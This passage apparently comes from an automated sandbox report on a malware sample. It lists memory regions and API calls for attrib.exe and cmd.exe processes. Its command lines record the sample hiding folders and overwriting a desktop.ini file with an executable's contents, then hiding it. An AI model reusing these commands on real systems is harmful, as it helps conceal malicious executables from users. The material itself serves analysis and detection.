0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12696 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12697 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12698 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 12699 start_va = 0xa00000 end_va = 0xa06fff entry_point = 0xa00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12700 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12701 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12702 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12703 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12704 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12705 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12706 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12707 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12708 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 12709 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12710 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12711 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12712 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12713 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12714 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12715 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12716 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12717 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12718 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12719 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12720 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12721 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12722 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12723 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12724 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 175 os_tid = 0xc08 Process: id = "119" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xa70" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12735 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12736 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12737 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12738 start_va = 0x70000 
end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12739 start_va = 0x990000 end_va = 0x996fff entry_point = 0x990000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12740 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12741 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12742 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12743 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 12744 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12745 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12746 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12747 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 12748 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12749 start_va = 0x3e0000 end_va = 0x3effff 
entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 12750 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12751 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12752 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12753 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12754 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12755 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12756 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12757 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12758 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 
0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12759 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12760 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12761 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12762 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 12763 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12764 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 176 os_tid = 0xbd8 Process: id = "120" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xa70" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12765 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12766 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12767 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12768 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12769 start_va = 0x530000 end_va = 0x536fff entry_point = 0x530000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12770 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12771 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12772 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12773 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 12774 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12775 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12776 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12777 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12778 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 12779 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 12780 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12781 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12782 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12783 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12784 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12785 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 
region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12786 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12787 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12788 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12789 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12790 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12791 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12792 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12793 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12794 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 177 os_tid = 0xbc0 Process: id = "121" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12827 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12828 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12829 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12830 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12831 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = 
"cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12832 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12833 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12834 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12835 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12836 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12885 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12886 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12887 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12888 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 12889 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 12890 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12891 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12892 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12893 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12894 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12895 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12896 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12897 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12898 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12899 start_va = 0xd0000 end_va = 0x197fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" 
Region: id = 12900 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12901 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12902 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 12903 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 12904 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 12905 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12906 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 12907 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 12908 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 12958 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 180 os_tid = 0xa4c [0133.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efd0c | out: lpSystemTimeAsFileTime=0x2efd0c*(dwLowDateTime=0x89683e60, dwHighDateTime=0x1d440a9)) [0133.330] 
GetCurrentProcessId () returned 0xa44 [0133.330] GetCurrentThreadId () returned 0xa4c [0133.330] GetTickCount () returned 0x2a5c0 [0133.330] QueryPerformanceCounter (in: lpPerformanceCount=0x2efd04 | out: lpPerformanceCount=0x2efd04*=19011991006) returned 1 [0133.331] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0133.331] __set_app_type (_Type=0x1) [0133.331] __p__fmode () returned 0x76b331f4 [0133.331] __p__commode () returned 0x76b331fc [0133.331] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0133.332] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0133.332] GetCurrentThreadId () returned 0xa4c [0133.332] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa4c) returned 0x38 [0133.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.332] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0133.332] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.332] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.332] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efc9c | out: phkResult=0x2efc9c*=0x0) returned 0x2 [0133.332] VirtualQuery (in: lpAddress=0x2efcd3, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc6c, dwLength=0x1c | out: lpBuffer=0x2efc6c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.332] VirtualQuery (in: 
